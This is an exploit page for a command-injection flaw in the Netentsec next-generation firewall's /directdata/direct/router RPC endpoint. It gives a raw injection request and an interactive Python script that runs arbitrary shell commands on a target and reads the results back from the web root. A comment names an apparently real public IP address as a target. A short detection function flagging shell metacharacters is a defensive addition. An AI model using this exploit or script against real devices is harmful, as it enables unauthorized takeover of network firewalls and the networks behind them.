Netentsec (网康) Next-Generation Firewall Command Execution

FOFA search

Vulnerable path

/directdata/direct/router

Vulnerable request packet

POST /directdata/direct/router HTTP/1.1
Host: 192.168.1.86
Connection: close
Content-Length: 160
Upgrade-Insecure-Requests: 1

{"action":"SSLVPN_Resource","method":"deleteImage","data":[{"data":["/var/www/html/d.txt;id >/var/www/html/test.txt"]}],"type":"rpc","tid":17,"f8839p7rqtj":"="}
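For detection, the request above can be recognised by shell metacharacters inside the string arguments of an RPC call to this path. The following is an added example, not code from the original post; it assumes request bodies are available to the check (for instance at a reverse proxy in front of the management interface), and the names `suspicious_args`, `iter_strings` and `BENIGN_BODY` are hypothetical. Accepting a JSON array of calls is a defensive assumption about the router, not something the page states.

```python
import json
import re

ROUTER_PATH = "/directdata/direct/router"
# Characters a shell treats specially; a file path passed to the RPC needs none of them.
SHELL_META = re.compile(r"[;|&`$<>\n]")

# Body of the request shown on this page, followed by a constructed benign call.
PAGE_BODY = ('{"action":"SSLVPN_Resource","method":"deleteImage","data":[{"data":'
             '["/var/www/html/d.txt;id >/var/www/html/test.txt"]}],'
             '"type":"rpc","tid":17,"f8839p7rqtj":"="}')
BENIGN_BODY = ('{"action":"SSLVPN_Resource","method":"deleteImage","data":[{"data":'
               '["/var/www/html/d.txt"]}],"type":"rpc","tid":18}')


def iter_strings(value):
    """Yield every string nested anywhere inside a decoded JSON value."""
    if isinstance(value, str):
        yield value
    elif isinstance(value, dict):
        for item in value.values():
            yield from iter_strings(item)
    elif isinstance(value, list):
        for item in value:
            yield from iter_strings(item)


def suspicious_args(method, path, body):
    """Return (action, method, argument) for each RPC argument holding shell metacharacters."""
    if method.upper() != "POST" or path.split("?", 1)[0].rstrip("/") != ROUTER_PATH:
        return []
    try:
        doc = json.loads(body)
    except (ValueError, TypeError):
        return []  # not JSON: nothing this check can say about it
    calls = doc if isinstance(doc, list) else [doc]  # assumption: calls may be batched
    hits = []
    for call in calls:
        if isinstance(call, dict):
            for arg in iter_strings(call.get("data")):
                if SHELL_META.search(arg):
                    hits.append((call.get("action"), call.get("method"), arg))
    return hits


if __name__ == "__main__":
    for sample in (PAGE_BODY, BENIGN_BODY):
        print(suspicious_args("POST", ROUTER_PATH, sample) or "clean")
```

A hit is grounds to block the request and to inspect the web root for unexpected files such as the `test.txt` that the request above writes.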

Python script

# -*- coding: utf-8 -*-
# Netentsec next-generation firewall command execution
#https://183.203.214.146
import sys

import colorama
import requests
from colorama import *

# The script disables certificate verification, so silence the resulting warnings.
requests.packages.urllib3.disable_warnings()
init(autoreset=True)


def title():
    print(colorama.Fore.GREEN + '+-------------------------------------------------------------+')
    print(colorama.Fore.GREEN + '+ 网康下一代防火墙 命令执行 + RCE +')
    print(colorama.Fore.GREEN + '+-------------------------------------------------------------+')
    print(colorama.Fore.GREEN + '+ EXP: python3 wangkangFirewall.py https://1.1.1.1:8443 +')
    print(colorama.Fore.GREEN + '+-------------------------------------------------------------+')
    print(colorama.Fore.GREEN + '+ 请输入url-格式为:https://xx.xx.xx.xx +')


def cmd(urllist, cmdsr):
    url = urllist + '/directdata/direct/router'
    # Same JSON body as the request packet above, with the command substituted in.
    data = {"action": "SSLVPN_Resource", "data": [{"data": ["/var/www/html/d.txt;%s >/var/www/html/test.txt" % cmdsr]}], "f8839p7rqtj": "=", "method": "deleteImage", "tid": 17, "type": "rpc"}
    cmdlist = requests.post(url=url, json=data, verify=False)
    # Read back the output file written under the web root.
    urlshow = urllist + '/test.txt'
    cmdshow = requests.get(url=urlshow, verify=False)
    cmdshowlist = cmdshow.text
    if len(cmdshowlist) == 0:
        print(colorama.Fore.YELLOW + '未读取到信息,请检查命令是否输入正确')
    print('------------------------------执行结果----------------------------------\n')
    print(colorama.Fore.RED + '{} '.format(cmdshow.text))
    print('------------------------------------------------------------------------\n')
    print(colorama.Fore.GREEN + '+ 输入下条需要执行的命令--退出输入Q: +')
    jhlist = input('')
    if jhlist == 'Q':
        pass
    else:
        cmd(urllist, jhlist)


if __name__ == '__main__':
    #print('------------------------------------------------------------------------\n')
    title()
    url = input(' ')
    print(colorama.Fore.YELLOW + '------------------------------------------------------------------------\n')
    print(colorama.Fore.GREEN + '+ 输入需要执行的命令 +')
    cmds = input('')
    print(colorama.Fore.YELLOW + '------------------------------------------------------------------------\n')
    cmd(url, cmds)
